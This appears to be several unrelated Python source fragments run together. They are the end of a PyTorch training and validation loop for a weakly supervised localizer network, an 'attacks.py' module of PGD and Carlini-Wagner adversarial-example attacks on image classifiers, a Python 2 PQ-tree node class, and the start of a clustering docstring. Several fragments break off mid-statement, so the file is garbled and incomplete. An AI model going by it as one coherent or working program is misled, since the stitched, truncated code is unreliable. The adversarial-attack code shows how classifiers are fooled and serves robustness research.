maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
output = maxPool(output_heatmap)
elif args.arch == 'localizer_alexnet_robust':
max_pool_k = output_heatmap[0].shape[2]
maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
output = maxPool(output_heatmap[0])
max_pool_k1 = output_heatmap[1].shape[2]
maxPool1 = nn.MaxPool2d(kernel_size=max_pool_k1)
output_1 = maxPool1(output_heatmap[1])
max_pool_k2 = output_heatmap[2].shape[2]
maxPool2 = nn.MaxPool2d(kernel_size=max_pool_k2)
output_2 = maxPool2(output_heatmap[2])
output = output*0.333 + output_1*0.333 + output_2*0.333
output = output.view(output.shape[0], output.shape[1])
loss = criterion(output*wgt, target*wgt)
# measure metrics and record loss
sigmoid = nn.Sigmoid()
m1 = metric1(sigmoid(output), target, wgt)
m2 = metric2(sigmoid(output), target, wgt)
losses.update(loss.item(), img_input.size(0))
avg_m1.update(m1)
avg_m2.update(m2)
# TODO:
# compute gradient and do SGD step
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Metric1 {avg_m1.val:.3f} ({avg_m1.avg:.3f})\t'
'Metric2 {avg_m2.val:.3f} ({avg_m2.avg:.3f})'.format(
epoch,
i,
len(train_loader),
batch_time=batch_time,
data_time=data_time,
loss=losses,
avg_m1=avg_m1,
avg_m2=avg_m2))
#TODO: Visualize/log things as mentioned in handout
#TODO: Visualize at appropriate intervals
if USE_WANDB and i % args.print_freq == 0:
wandb.log({"train/loss": loss, "train/cntr":cntr_train})
wandb.log({"train/m1": m1, "train/cntr":cntr_train})
wandb.log({"train/m2": m2, "train/cntr":cntr_train})
cntr_train+=1
# End of train()
return loss.detach()
def validate(val_loader, model, criterion, epoch = 0):
global cntr_val
batch_time = AverageMeter()
losses = AverageMeter()
avg_m1 = AverageMeter()
avg_m2 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (data) in enumerate(val_loader):
# TODO: Get inputs from the data dict
img_input = torch.stack(data[0], dim=0).cuda()
target = torch.stack(data[1], dim=0).cuda()
wgt = torch.stack(data[2], dim=0).cuda()
# TODO: Get output from model
# TODO: Perform any necessary functions on the output
# TODO: Compute loss using ``criterion``
output_heatmap = model(img_input)
if args.arch == 'localizer_alexnet':
max_pool_k = output_heatmap.shape[2]
maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
output = maxPool(output_heatmap)
elif args.arch == 'localizer_alexnet_robust':
max_pool_k = output_heatmap[0].shape[2]
maxPool = nn.MaxPool2d(kernel_size=max_pool_k)
output = maxPool(output_heatmap[0])
max_pool_k1 = output_heatmap[1].shape[2]
maxPool1 = nn.MaxPool2d(kernel_size=max_pool_k1)
output_1 = maxPool1(output_heatmap[1])
max_pool_k2 = output_heatmap[2].shape[2]
maxPool2 = nn.MaxPool2d(kernel_size=max_pool_k2)
output_2 = maxPool2(output_heatmap[2])
output = output*0.333 + output_1*0.333 + output_2*0.333
output = output.view(output.shape[0], output.shape[1])
loss = criterion(output*wgt, target*wgt)
sigmoid = nn.Sigmoid()
# measure metrics and record loss
m1 = metric1(sigmoid(output), target, wgt)
m2 = metric2(sigmoid(output), target, wgt)
losses.update(loss.item(), img_input.size(0))
avg_m1.update(m1)
avg_m2.update(m2)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Metric1 {avg_m1.val:.3f} ({avg_m1.avg:.3f})\t'
'Metric2 {avg_m2.val:.3f} ({avg_m2.avg:.3f})'.format(
i,
len(val_loader),
batch_time=batch_time,
loss=losses,
avg_m1=avg_m1,
avg_m2=avg_m2))
#TODO: Visualize things as mentioned in handout
#TODO: Visualize at appropriate intervals
if USE_WANDB:
if i % args.print_freq == 0:
wandb.log({"val/loss": loss, "val/cntr":cntr_val})
wandb.log({"val/m1": m1, "val/cntr":cntr_val})
wandb.log({"val/m2": m2, "val/cntr":cntr_val})
cntr_val+=1
if i<5 and epoch%14==0:
gt_np_img = img_input[0].detach().cpu().numpy().mean(axis=0)
wandb.log({'heatmaps/epoch_{}_gt_img_{}'.format(epoch, i): wandb.Image(gt_np_img)})
weighted_target = (target[0] * wgt[0]).detach().cpu().numpy()
heat_i = 0
resize512 = transforms.Resize((512, 512))
for class_i in range(20):
print(weighted_target[class_i])
if weighted_target[class_i]==1:
target_gt = class_i
else:
continue
if args.arch == 'localizer_alexnet':
print("output heatmap shape ", output_heatmap.shape)
print(torch.sum(torch.isnan(output_heatmap[0,target_gt]).type(torch.uint8)))
out_heat = resize512(output_heatmap[0,target_gt][None,:,:])
selected_heatmap = out_heat.detach().cpu()
# selected_heatmap = selected_heatmap[None,:,:]
elif args.arch == 'localizer_alexnet_robust':
print("output heatmap shape ", output_heatmap[0].shape, output_heatmap[1].shape, output_heatmap[2].shape)
# print(torch.sum(torch.isnan(output_heatmap[0][0,target_gt]).type(torch.uint8)))
out_heat = resize512(output_heatmap[0][0,target_gt][None,:,:]) * 0.333
out_heat1 = resize512(output_heatmap[1][0,target_gt][None,:,:]) * 0.333
out_heat2 = resize512(output_heatmap[2][0,target_gt][None,:,:]) * 0.333
selected_heatmap = out_heat + out_heat1 + out_heat2
selected_heatmap = selected_heatmap.detach().cpu()
print("target gt", target_gt)
selected_heatmap = resize512(selected_heatmap)
selected_heatmap = torch.permute(selected_heatmap, (1,2,0)).numpy()
print(selected_heatmap.min())
print(selected_heatmap.max())
wandb.log({'heatmaps/epoch_{}_img_{}_heatmap_{}'.format(epoch, i, target_gt): wandb.Image(selected_heatmap)})
print(' * Metric1 {avg_m1.avg:.3f} Metric2 {avg_m2.avg:.3f}'.format(
avg_m1=avg_m1, avg_m2=avg_m2))
return avg_m1.avg, avg_m2.avg
# TODO: You can make changes to this function if you wish (not necessary)
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def metric1(pred, gt, valid):
# TODO: Ignore for now - proceed till instructed
pred = torch.sigmoid(pred).cpu().detach().numpy()
| |
<filename>attacks.py
from PIL import Image
from torchvision import transforms
import torch
from models import *
from torch import nn, optim
from torchvision.models import resnet50
from torchvision.models.vgg import VGG
import torchvision.models.densenet as densenet
import torchvision.models.alexnet as alexnet
from torchvision.utils import save_image
import torch.nn.functional as F
from advertorch.utils import batch_multiply
from advertorch.utils import batch_clamp
from advertorch.utils import clamp
from torch import optim
from torch.autograd import Variable
import json
import os
import numpy as np
import argparse
from tqdm import tqdm
from utils import *
import ipdb
from advertorch.attacks import LinfPGDAttack, L2PGDAttack
def whitebox_pgd(args, model):
adversary = L2PGDAttack(
model, loss_fn=nn.CrossEntropyLoss(reduction="sum"), eps=0.3,
nb_iter=40, eps_iter=0.01, rand_init=True, clip_min=-1.0, clip_max=1.0,
targeted=False)
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform_train)
train_loader = torch.utils.data.DataLoader(trainset,batch_size=1,
shuffle=True, num_workers=8)
train_itr = tqdm(enumerate(train_loader),total=len(train_loader.dataset))
correct = 0
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
adv_image = adversary.perturb(x, target)
pred = model(adv_image)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += out.eq(target.unsqueeze(1).data)
acc = 100. * correct.cpu().numpy() / len(train_loader.dataset)
print("PGD attack succes rate %f" %(acc))
def white_box_untargeted(args, image, target, model, enc=None, dec=None, \
vae=None, ae= None, normalize=None):
epsilon = 0.3
# Create noise vector
delta = torch.zeros_like(image,requires_grad=True).to(args.device)
# Optimize noise vector (only) to fool model
x = image
use_vae = True if (vae is not None) else False
use_ae = True if (ae is not None) else False
print("Target is %d" %(target))
for t in range(args.PGD_steps):
if normalize is not None:
if use_vae:
x = x.view(x.size(0), -1).unsqueeze(0)
z, mu, logvar = vae(x)
z = z.clamp(0, 1)
x = z.view(z.size(0), 1, 28, 28)
elif use_ae:
x = ae(x)
pred = model(normalize(x + delta))
else:
if use_vae:
x = x.view(x.size(0), -1).unsqueeze(0)
z, mu, logvar = vae(x)
z = z.clamp(0, 1)
x = z.view(z.size(0), 1, 28, 28)
elif use_ae:
x = ae(x)
pred = model(x.detach() + delta)
recon_pred = model(x.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
recon_out = recon_pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = nn.CrossEntropyLoss(reduction="sum")(pred, target)
recon_image = (x)[0].detach()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
plot_image_to_comet(args,recon_image,"recon.png")
if t % 5 == 0:
print(t, out[0][0], recon_out[0][0], loss.item())
loss.backward()
grad_sign = delta.grad.data.sign()
delta.data = delta.data + batch_multiply(0.01, grad_sign)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = clamp(x.data + delta.data,0.,1.) - x.data
delta.grad.data.zero_()
# if out != target:
# print(t, out[0][0], loss.item())
# break
if args.comet:
if not args.mnist:
clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
else:
clean_image = (image)[0].detach()
adv_image = (x + delta)[0].detach()
recon_image = (x)[0].detach()
delta_image = (delta)[0].detach().cpu()
plot_image_to_comet(args,clean_image,"clean.png")
plot_image_to_comet(args,adv_image,"Adv.png")
plot_image_to_comet(args,delta_image,"delta.png")
plot_image_to_comet(args,recon_image,"recon.png")
return out, delta
def single_white_box_generator(args, image, target, model, G):
epsilon = 0.5
# Create noise vector
x = image
opt = optim.SGD(G.parameters(), lr=1e-2)
print("Target is %d" %(target))
for t in range(args.PGD_steps):
delta, kl_div = G(x)
delta = delta.view(delta.size(0), 1, 28, 28)
delta.data.clamp_(-epsilon, epsilon)
delta.data = clamp(x.data + delta.data,0.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = -nn.CrossEntropyLoss(reduction="sum")(pred, target)
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
if t % 5 == 0:
print(t, out[0][0], loss.item())
opt.zero_grad()
loss.backward()
for p in G.parameters():
p.grad.data.sign_()
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
# delta.data.clamp_(-epsilon, epsilon)
# delta.data = clamp(x.data + delta.data,0.,1.) - x.data
opt.step()
if out != target:
print(t, out[0][0], loss.item())
break
if args.comet:
if not args.mnist:
clean_image = (image)[0].detach().cpu().numpy().transpose(1,2,0)
adv_image = (x + delta)[0].detach().cpu().numpy().transpose(1,2,0)
delta_image = (delta)[0].detach().cpu().numpy().transpose(1,2,0)
else:
clean_image = (image)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png")
plot_image_to_comet(args,adv_image,"Adv.png")
plot_image_to_comet(args,delta_image,"delta.png")
return out, delta
def PGD_generate_multiple_samples(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
epsilon = args.epsilon
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.test_batch_size)
correct_test = 0
correct_batch_avg_list = []
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
correct_batch_avg = 0
for t in range(10):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct_batch_avg = out.eq(target.unsqueeze(1).data).sum()
correct_batch_avg = correct_batch_avg / (10*len(x))
correct_batch_avg_list.append(correct_batch_avg)
correct_test += out.eq(target.unsqueeze(1).data).sum()
batch_avg = sum(correct_batch_avg) / len(correct_batch_avg)
print('\nTest set: Accuracy: {}/{} ({:.0f}%) | Multiple Samples Accuracy{:.0f}\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test / len(test_loader.dataset), batch_avg))
if args.comet:
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def PGD_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28):
''' Testing Phase '''
epsilon = args.epsilon
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.test_batch_size)
correct_test = 0
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
# for t in range(args.PGD_steps):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct_test += out.eq(target.unsqueeze(1).data).sum()
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test / len(test_loader.dataset)))
if args.comet:
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()#.permute(-1,1,2,0)
adv_image = (x + delta)[index:index+64].detach()#.permute(-1,1,2,0)
delta_image = (delta)[index:index+64].detach()#.permute(-1,1,2,0)
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
plot_image_to_comet(args,clean_image,"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,"delta.png",normalize=True)
def L2_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28,mode="NotTest"):
''' Testing Phase '''
test_itr = tqdm(enumerate(test_loader),\
total=len(test_loader.dataset)/args.batch_size)
correct_test = 0
# Empty list to hold resampling results. Since we loop batches, results
# accumulate in appropriate list index, where index is the sampling number
resample_adv = [[] for i in range(args.resample_iterations)]
for batch_idx, (data, target) in test_itr:
x, target = data.to(args.device), target.to(args.device)
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
adv_inputs = x + delta
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
corr_adv_tensor = out.eq(target.unsqueeze(1).data)
correct_test += out.eq(target.unsqueeze(1).data).sum()
idx = corr_adv_tensor > 0
# Resample failed examples
if mode == 'Test' and args.resample_test:
re_x = x.detach()
for j in range(args.resample_iterations):
if len(re_x) == 0:
break
delta, kl_div = G(re_x)
adv_inputs = re_x + delta.detach()
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs.detach())
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
# From previous correct adv tensor,get indices for correctly pred
# Since we care about those on which attack failed
correct_failed_adv = out.eq(target.unsqueeze(1).data)
failed_only = correct_failed_adv[idx]
for i in range(0,len(idx)):
if idx[i] == 1:
if correct_failed_adv[i] == 0:
idx[i] = 0
resample_adv[j].extend(failed_only.cpu().numpy().tolist())
print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
.format(correct_test, len(test_loader.dataset),\
100. * correct_test.cpu().numpy() / len(test_loader.dataset)))
if args.comet:
test_acc = 100. * correct_test / len(test_loader.dataset)
args.experiment.log_metric("Test Adv Accuracy",test_acc,step=epoch)
if not args.mnist:
index = np.random.choice(len(x) - 64, 1)[0]
clean_image = (x)[index:index+64].detach()
adv_image = (x + delta)[index:index+64].detach()
delta_image = (delta)[index:index+64].detach()
else:
clean_image = (x)[0].detach()
adv_image = (x + delta)[0].detach()
delta_image = (delta)[0].detach()
file_base = "adv_images/" + args.namestr + "/"
if not os.path.exists(file_base):
os.makedirs(file_base)
plot_image_to_comet(args,clean_image,file_base+"clean.png",normalize=True)
plot_image_to_comet(args,adv_image,file_base+"Adv.png",normalize=True)
plot_image_to_comet(args,delta_image,file_base+"delta.png",normalize=True)
# Log resampling stuff
if mode =='Test' and args.resample_test:
cumulative = 0
size_test = len(resample_adv[0])
for j in range(len(resample_adv)):
fooled = len(resample_adv[j]) - sum(resample_adv[j])
if len(resample_adv[j]) == 0:
percent_fooled = 0
else:
percent_fooled = fooled / len(resample_adv[j])
cumulative += fooled
cum_per_fooled = cumulative / size_test
print("Resampling perc fooled %f at step %d" % (percent_fooled,j))
print("Resampling perc cumulative fooled %f at step %d" % (cum_per_fooled,j))
if args.comet:
args.experiment.log_metric("Resampling perc fooled",percent_fooled,step=j)
args.experiment.log_metric("Resampling perc cumulative fooled",cum_per_fooled,step=j)
def carlini_wagner_loss(args, output, target, scale_const=1):
# compute the probability of the label class versus the maximum other
target_onehot = torch.zeros(target.size() + (args.classes,))
target_onehot = target_onehot.cuda()
target_onehot.scatter_(1, target.unsqueeze(1), 1.)
target_var = Variable(target_onehot, requires_grad=False)
real = (target_var * output).sum(1)
confidence = 0
other = ((1. | |
<filename>emr_mine_python_scipts/pq_tree/PQNode.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from SiblingVector import SiblingVector
pq_counter = 0
class PQNode(object):
""" generated source for PQNode
"""
LABEL_EMPTY = 0
LABEL_PARTIAL = 1
LABEL_FULL = 2
TYPE_PNODE = 0
TYPE_QNODE = 1
label = 0
blocked = bool()
queued = bool()
type = 0
pertinentChildCount = 0
pertinentLeafCount = 0
parent = None
left = None
right = None
fullLeft = None
fullRight = None
partialLeft = None
partialRight = None
childCount = 0
fullChildCount = 0
partialChildCount = 0
data = None
deleted = bool()
pseudoNode = bool()
endMostChildren = None
siblings = None
childAccessNode = None
fullChildAccessNode = None
partialChildAccessNode = None
subLeafCount = 0
depth = 0
childBounds = 0
leftBound = 0
def init(self, pNode = True):
self.childAccessNode = None
self.fullChildAccessNode = None
self.partialChildAccessNode = None
self.endMostChildren = None
self.siblings = None
self.childCount = 0
self.fullChildCount = 0
self.partialChildCount = 0
self.label = self.LABEL_EMPTY
self.pertinentChildCount = 0
self.pertinentLeafCount = 0
self.queued = False
self.parent = None
self.left = None
self.right = None
self.fullLeft = None
self.fullRight = None
self.partialLeft = None
self.partialRight = None
if pNode:
self.type = self.TYPE_PNODE
else:
self.type = self.TYPE_QNODE
self.data = None
self.deleted = False
self.pseudoNode = False
global pq_counter
self.internal_id = pq_counter
pq_counter += 1
def __init__(self, data = None):
self.init(True)
if data != None:
self.data = data
def getPertinentChildCount(self):
return self.pertinentChildCount
def setPertinentChildCount(self, value):
self.pertinentChildCount = value
def getPertinentLeafCount(self):
return self.pertinentLeafCount
def setPertinentLeafCount(self, value):
self.pertinentLeafCount = value
def isPseudoNode(self):
return self.pseudoNode
def pseudoNode(self):
self.pseudoNode = True
self.childBounds = 0
self.leftBound = sys.maxint
self.subLeafCount = self.pertinentChildCount
def isDeleted(self):
return self.deleted
def delete(self):
self.init(False)
self.deleted = True
def getParent(self):
return self.parent
def setParent(self, theParent):
self.parent = theParent
def getSiblings(self):
return self.siblings
def getNumFullChildren(self):
return self.fullChildCount
def getNumPartialChildren(self):
return self.partialChildCount
def isQNode(self):
return (self.type == self.TYPE_QNODE)
def isPNode(self):
return (self.type == self.TYPE_PNODE)
def isFull(self):
return (self.label == self.LABEL_FULL)
def isPartial(self):
return (self.label == self.LABEL_PARTIAL)
def isEmpty(self):
return (self.label == self.LABEL_EMPTY)
def isBlocked(self):
return self.blocked
def setBlocked(self):
self.blocked = True
def setUnblocked(self):
self.blocked = False
def setQueued(self):
self.queued = True
def isQueued(self):
return self.queued
def getData(self):
return self.data
def getLabel(self):
return self.label
def getEndMostChildren(self):
return self.endMostChildren
def becomeRoot(self):
self.parent = None
def getDepth(self):
return self.depth
def getNumChildren(self):
if self.isQNode():
raise Exception("*** Warning, Qnodes do not store num children")
return self.childCount
def getNumEmptyChildren(self):
if self.isQNode():
raise Exception("*** Warning, Qnodes do not store num (empty) children")
return self.childCount - self.fullChildCount - self.partialChildCount
def convertToQNode(self):
self.type = self.TYPE_QNODE
self.endMostChildren = []
if self.childCount > 0:
raise Exception("*** ERROR cannot convert to qnode unless no children present!")
def convertToPNode(self):
self.type = self.TYPE_PNODE
self.endMostChildren = None
def labelAsFull(self):
if not self.isFull():
if self.parent is not None:
self.parent.removeChild(self, False)
self.label = self.LABEL_FULL
if self.parent is not None:
self.parent.addChild(self, False)
def labelAsPartial(self):
if not self.isPartial():
if self.parent is not None:
self.parent.removeChild(self, False)
self.label = self.LABEL_PARTIAL
if self.parent is not None:
self.parent.addChild(self, False)
def labelAsEmpty(self):
if not self.isEmpty():
if self.parent is not None:
self.parent.removeChild(self, False)
self.label = self.LABEL_EMPTY
if self.parent is not None:
self.parent.addChild(self, False)
def hasChildren(self):
if self.isPNode():
return self.childCount > 0
else:
if self.isQNode():
return len(self.endMostChildren) > 0
else:
return False
def getAllChildren(self):
allVector = []
if self.isPNode():
if self.hasChildren():
currentNode = self.childAccessNode
while True:
allVector.append(currentNode)
if currentNode is None:
print "parent of crap: " + self.infoString()
currentNode = currentNode.right
if (currentNode == self.childAccessNode):
break
else:
if self.isQNode():
if self.hasChildren():
previousNode = None
currentNode = self.endMostChildren[0]
nextNode = PQNode()
lastNode = None
if self.isPseudoNode():
if currentNode.siblings.siblingAt(0) is not None and (currentNode.siblings.siblingAt(0).parent != self):
previousNode = currentNode.siblings.siblingAt(0)
else:
if currentNode.siblings.siblingAt(1) is not None and (currentNode.siblings.siblingAt(1).parent != self):
previousNode = currentNode.siblings.siblingAt(1)
if len(self.endMostChildren) > 1:
tempNode = self.endMostChildren[1]
if tempNode.siblings.siblingAt(0) is not None and (tempNode.siblings.siblingAt(0).parent != self):
lastNode = tempNode.siblings.siblingAt(0)
else:
if tempNode.siblings.siblingAt(1) is not None and (tempNode.siblings.siblingAt(1).parent != self):
lastNode = tempNode.siblings.siblingAt(1)
while True:
allVector.append(currentNode)
nextNode = currentNode.siblings.nextSibling(previousNode)
previousNode = currentNode
currentNode = nextNode
if (currentNode == lastNode):
break
return allVector
def moveFullChildrenTo(self, newNode):
if self.isPNode():
if self.fullChildCount > 0:
currentNode = self.fullChildAccessNode
nextNode = PQNode()
while True:
nextNode = currentNode.fullRight
self.removeChild(currentNode)
newNode.addChild(currentNode)
currentNode = nextNode
if self.fullChildAccessNode is None:
break
else:
raise Exception("*** ERROR move full children method not meant for children of q nodes!")
def getPartialChild(self, index):
if index + 1 > self.partialChildCount:
raise Exception("*** ERROR tried to get a partial child that does not exist! [" + index + "]")
if (index == 0):
return self.partialChildAccessNode
else:
if (index == 1):
return self.partialChildAccessNode.partialRight
else:
raise Exception("*** ERROR tried to get a partial child that does not exist! [" + index + "]")
def removeOnlyFullChild(self):
if self.isPNode():
if (self.fullChildCount != 1):
raise Exception("*** ERROR not exactly one full child to remove! " + self.fullChildCount)
returnNode = self.fullChildAccessNode
self.removeChild(returnNode)
return returnNode
else:
raise Exception("*** ERROR remove only full child is only meant for p nodes!")
def removeOnlyEmptyChild(self):
if self.isPNode():
if (self.getNumEmptyChildren() != 1):
raise Exception("*** ERROR not exactly one empty child to remove! " + self.getNumEmptyChildren())
returnNode = self.childAccessNode
while True:
if returnNode.isEmpty():
break
returnNode = returnNode.right
if (returnNode == self.childAccessNode):
break
self.removeChild(returnNode)
return returnNode
else:
raise Exception("*** ERROR remove only empty child is only meant for p nodes!")
def addChild(self, pq, modify = True):
if pq.isFull():
self.fullChildCount += 1
pq.fullLeft = None
pq.fullRight = None
if self.fullChildAccessNode is None:
self.fullChildAccessNode = pq
self.fullChildAccessNode.fullLeft = self.fullChildAccessNode
self.fullChildAccessNode.fullRight = self.fullChildAccessNode
else:
pq.fullLeft = self.fullChildAccessNode.fullLeft
pq.fullLeft.fullRight = pq
self.fullChildAccessNode.fullLeft = pq
pq.fullRight = self.fullChildAccessNode
self.fullChildAccessNode = pq
else:
if pq.isPartial():
self.partialChildCount += 1
pq.partialLeft = None
pq.partialRight = None
if self.partialChildAccessNode is None:
self.partialChildAccessNode = pq
self.partialChildAccessNode.partialLeft = self.partialChildAccessNode
self.partialChildAccessNode.partialRight = self.partialChildAccessNode
else:
pq.partialLeft = self.partialChildAccessNode.partialLeft
pq.partialLeft.partialRight = pq
self.partialChildAccessNode.partialLeft = pq
pq.partialRight = self.partialChildAccessNode
self.partialChildAccessNode = pq
if self.isPNode() and modify:
pq.parent = self
self.childCount += 1
pq.left = None
pq.right = None
pq.siblings = None
if self.childAccessNode is None:
self.childAccessNode = pq
self.childAccessNode.left = self.childAccessNode
self.childAccessNode.right = self.childAccessNode
else:
pq.left = self.childAccessNode.left
pq.left.right = pq
self.childAccessNode.left = pq
pq.right = self.childAccessNode
self.childAccessNode = pq
else:
if self.isQNode() and modify:
pq.parent = self
sibling = None
if pq.siblings is not None:
if pq.siblings.siblingAt(0) is not None and self.endMostChildren.contains(pq.siblings.siblingAt(0)):
sibling = pq.siblings.siblingAt(0)
else:
if pq.siblings.siblingAt(1) is not None and self.endMostChildren.contains(pq.siblings.siblingAt(1)):
sibling = pq.siblings.siblingAt(1)
else:
pq.siblings = SiblingVector()
if sibling is None:
## for-while
i = 0
while i < len(self.endMostChildren):
if (self.endMostChildren[i].label == pq.label):
sibling = self.endMostChildren[i]
break
else:
if self.endMostChildren[i].isFull() and pq.isPartial():
sibling = self.endMostChildren[i]
break
else:
if self.endMostChildren[i].isPartial() and pq.isFull():
sibling = self.endMostChildren[i]
break
i += 1
if sibling is None and len(self.endMostChildren) > 0:
sibling = self.endMostChildren[0]
if sibling is not None:
if len(self.endMostChildren) > 1:
self.endMostChildren.remove(sibling)
self.endMostChildren.append(pq)
sibling.siblings.addSibling(pq)
pq.siblings.addSibling(sibling)
else:
self.endMostChildren.append(pq)
else:
if self.isQNode() and self.isPseudoNode():
pq.parent = self
if self.childAccessNode is None:
self.childAccessNode = pq
if pq.siblings is not None and (len(pq.siblings) == 2):
if not pq.siblings.siblingAt(0).parent.isPseudoNode() and pq.siblings.siblingAt(1).parent.isPseudoNode():
self.endMostChildren.append(pq)
else:
raise Exception("*** ERROR invalid child being added to pseudonode!")
def absorbPartialChild(self, partialChild):
if self.isQNode() and partialChild.isQNode() and partialChild.isPartial():
fullConnectChild = partialChild.siblings.siblingAt(0)
if not fullConnectChild.isFull() and not fullConnectChild.isPartial():
fullConnectChild = partialChild.siblings.siblingAt(1)
if fullConnectChild is not None and not fullConnectChild.isFull() and not fullConnectChild.isPartial():
fullConnectChild = None
emptyConnectChild = partialChild.siblings.siblingAt(0)
if not emptyConnectChild.isEmpty():
emptyConnectChild = partialChild.siblings.siblingAt(1)
if emptyConnectChild is not None and not emptyConnectChild.isEmpty():
emptyConnectChild = None
fullJoinChild = partialChild.endMostChildren[0]
if not fullJoinChild.isFull():
fullJoinChild = None
if len(partialChild.endMostChildren) > 1:
fullJoinChild = partialChild.endMostChildren[1]
if not fullJoinChild.isFull():
fullJoinChild = None
emptyJoinChild = partialChild.endMostChildren[0]
if not emptyJoinChild.isEmpty():
emptyJoinChild = None
if len(partialChild.endMostChildren) > 1:
emptyJoinChild = partialChild.endMostChildren[1]
if not emptyJoinChild.isEmpty():
emptyJoinChild = None
if fullJoinChild is None or emptyJoinChild is None:
raise Exception("*** ERROR invalid partial child in absorb partial child!")
if fullConnectChild is not None:
fullJoinChild.siblings.addSibling(fullConnectChild)
fullConnectChild.siblings.removeSibling(partialChild)
fullConnectChild.siblings.addSibling(fullJoinChild)
else:
if not self.endMostChildren.remove(partialChild):
raise Exception("*** ERROR could not absorb partial child!")
fullJoinChild.parent = self
self.endMostChildren.append(fullJoinChild)
if emptyConnectChild is not None:
emptyJoinChild.siblings.addSibling(emptyConnectChild)
emptyConnectChild.siblings.removeSibling(partialChild)
emptyConnectChild.siblings.addSibling(emptyJoinChild)
else:
if not self.endMostChildren.remove(partialChild):
raise | |
'''
This file contains the functions for the groupig/clustering algorithm from Watkins & Yang, J. Phys. Chem. B, vol 109, no 1, 2005
that do the actual work. THis includes
